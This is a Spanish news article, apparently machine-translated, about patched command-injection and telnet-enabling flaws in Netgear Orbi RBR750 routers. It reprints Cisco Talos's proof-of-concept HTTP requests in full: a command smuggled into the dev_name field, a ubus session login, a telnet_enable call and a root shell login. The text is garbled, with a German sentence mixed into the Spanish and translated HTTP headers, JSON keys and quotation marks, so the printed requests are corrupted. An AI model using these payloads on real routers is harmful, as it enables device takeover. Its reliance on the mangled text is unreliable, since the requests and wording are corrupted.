Si su enrutador Netgear Orbi no está parcheado, debe cambiarlo de inmediato


Agrandar / Un enrutador de la serie Orbi 750. Netgear Si confía en el sistema inalámbrico de malla Orbi de Netgear para conectarse a Internet, debe asegurarse de que esté ejecutando el firmware más reciente, ya que el código de explotación para vulnerabilidades críticas se lanzó en versiones anteriores. El sistema inalámbrico en malla NETGEAR Orbi consta de un enrutador concentrador principal y uno o más enrutadores satélite que amplían el alcance de la red. Al configurar múltiples puntos de acceso en un hogar u oficina, forman un sistema de malla que garantiza que la cobertura WiFi esté disponible en todas partes.

Inserción remota de cualquier comando

El año pasado, los investigadores del equipo de seguridad Talos de Cisco descubrieron cuatro vulnerabilidades y las informaron de forma privada a Netgear. La más grave de las vulnerabilidades, rastreada como CVE-2022-37337, reside en la función de control de acceso del RBR750. Los piratas informáticos pueden explotarlo para ejecutar comandos de forma remota mediante el envío de solicitudes HTTP especialmente diseñadas al dispositivo. El hacker primero debe conectarse al dispositivo, ya sea conociendo la contraseña del SSID o accediendo a un SSID desprotegido. La gravedad del error se califica con 9,1 de 10 puntos posibles. En enero, Netgear lanzó actualizaciones de firmware que corrigieron la vulnerabilidad. Talos ahora ha publicado un código de explotación de prueba de concepto con detalles técnicos. «La función de control de acceso del Orbi RBR750 permite a un usuario agregar dispositivos explícitamente (especificados por la dirección MAC y un nombre de host) para permitir o bloquear el dispositivo especificado cuando intenta acceder a la red», escribieron los investigadores de Talos. „Der Parameter dev_name ist jedoch anfällig für Command Injection.“ Der veröffentlichte Exploit-Code lautet: POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1 Host: 10.0.0.1 Inhaltslänge: 104 Autorisierung: Basic YWRtaW46UGFzc3cwcmQ= Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/102.0.5005.61 Safari/537.36 Aceptar: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif, image/webp,image/ apng,*/*;q=0.8,aplicación/intercambio firmado;v=b3;q=0.9 Codificación de aceptación: gzip, deflate Idioma de aceptación: en-US,en;q=0.9 Cookie: delicious_magical_cookie=/; XSRF_TOKEN=2516336866 Conexión: close action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list El dispositivo responde con lo siguiente: root@RBR750:/tmp# ps | grep ping 21763 root 1336 S ping 10.0.0.4 Otras dos vulnerabilidades descubiertas por Talos también recibieron parches en enero. CVE-2022-36429 también es una falla de ejecución de comandos remotos que se puede explotar enviando una serie de paquetes maliciosos que crean un objeto JSON especialmente diseñado. La calificación de gravedad es 7.2. El exploit comienza usando la suma SHA256 de la contraseña con el nombre de usuario «admin» para devolver una cookie de autenticación, que se requiere para iniciar una sesión de telnet no documentada: POST /ubus HTTP/1.1 Host: 10.0.0.4 Longitud del contenido: 217 Aceptar: aplicación / json User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/102.0.5005.61 Safari/537.36 Content-Type: application/json Origin: http://10.0.0.4 Referer: http://10.0.0.4/ Aceptar codificación: gzip, desinflar Aceptar idioma: en-US,en;q=0.9 Conexión: cerrar {«método»:»llamar»,»params»:[«00000000000000000000000000000000″,»session»,»login»,{«username»:»admin»,»password»:»»,»timeout»:900}],»jsonrpc»:»2.0″,»id»:3} Aparece el token ‘ubus_rpc_session’ necesario para iniciar el servicio de telnet oculto: HTTP/1.1 200 OK Content-Type: application/json Content-Length: 829 Connection: Close Fecha: lunes, 11 de julio de 2022 19:27:03 GMT Servidor: lighttpd/1.4.45 {«jsonrpc»:»2.0″,»id»:3,»result»:[0,{«ubus_rpc_session»:»e6c28cc8358cb9182daa29e01782df67″,»timeout»:900,»expires»:899,»acls»:{«access-group»:{«netgear»:[«read»,»write»],»no autenticado»:[«read»]},»ubus»:{«netgear.get»:[«pot_details»,»satellite_status»,»connected_device»,»get_language»],»netgear.log»:[«ntgrlog_status»,»log_boot_status»,»telnet_status»,»packet_capture_status»,»firmware_version»,»hop_count»,»cpu_load»,»ntgrlog_start»,»ntgrlog_stop»,»log_boot_enable»,»log_boot_disable»,»telnet_enable»,»telnet_disable»,»packet_capture_start»,»packet_capture_stop»],»netgear.set»:[«set_language»],»netgear.actualizar»:[«upgrade_status»,»upgrade_version»,»upgrade_start»],»Reunión»:[«access»,»destroy»,»get»,»login»],»Sistema»:[«info»],»uci»:[«*»]},»webui-io»:{«descargar»:[«read»],»subir»:[«write»]}},»data»:{«username»:»admin»}}]} Luego, el atacante agrega un parámetro llamado ‘telnet_enable’ para iniciar el servicio telnet: POST /ubus HTTP/1.1 Host: 10.0.0.4 Content-Length: 138 Aceptar: aplicación/json Agente de usuario: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, como Gecko) Chrome/102.0.5005.61 Safari/537.36 Tipo de contenido: aplicación/json Origen: http ://10.0 .0.4 Referencia: http://10.0.0.4/status.html Aceptar codificación: gzip, desinflar Aceptar idioma: en-US,en;q=0.9 Conexión: cerrar {«método»:»llamar» ,»parámetros» :[«e6c28cc8358cb9182daa29e01782df67″,»netgear.log»,»telnet_enable»,»log_boot_enable»,{}],»jsonrpc»:»2.0″,»id»:13} La misma contraseña utilizada para generar el hash SHA256 con el nombre de usuario «admin» permite que un atacante inicie sesión en el servicio: $ telnet 10.0.0.4 Trying 10.0.0.4 . .. Conectado a 10.0.0.4. El carácter de escape es ‘^]’. Inicio de sesión: Contraseña de administrador: === WORMAL ========================== Utilice ‘passwd’ para establecer su contraseña de inicio de sesión. Esto deshabilitará telnet y habilitará SSH ——————————————- ———— BusyBox v1.30.1 ( ) bandeja integrada (cenicero) MM NM MMMMMMM MM $MMMMM MMMMM MMMMMMMMMMM MMM MMM MMMMMMMM MM MMMMM. MMMMM:MMMMMM: MMMM MMMMM MMMM= MMMMMM MMM MMMM MMMMM MMMM MMMMMM MMMM MMMMM’ MMMM= MMMMM MMMM MM MMMMM MMMM MMMM MMMMNMMMMMM MMMM= MMMM MMMMM MMMMM MMMM MMMM MMMMMMMM MMMM= MMMM MMMMMM MMMMM MMMM MMMM MMMMMMMMM MMMM Mmmmmmmmmmmmmmmm = mmmm mmmmmm mmmmmmmmmmmmmmmmmmmmmmm mmmm = mmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm. ————————————————– ———– Para aquellos a punto de rockear… (Chaos Calmer, rtm-4.6.8.5+r49254) —————— – ————————————————– ——- root@RBS750:/ # La otra vulnerabilidad parcheada es CVE-2022-38458 con una gravedad de 6.5. Proviene del dispositivo que solicita a los usuarios que ingresen una contraseña a través de una conexión HTTP sin cifrar. Un atacante en la misma red puede entonces espiar la contraseña.

Deja una respuesta

Tu dirección de correo electrónico no será publicada.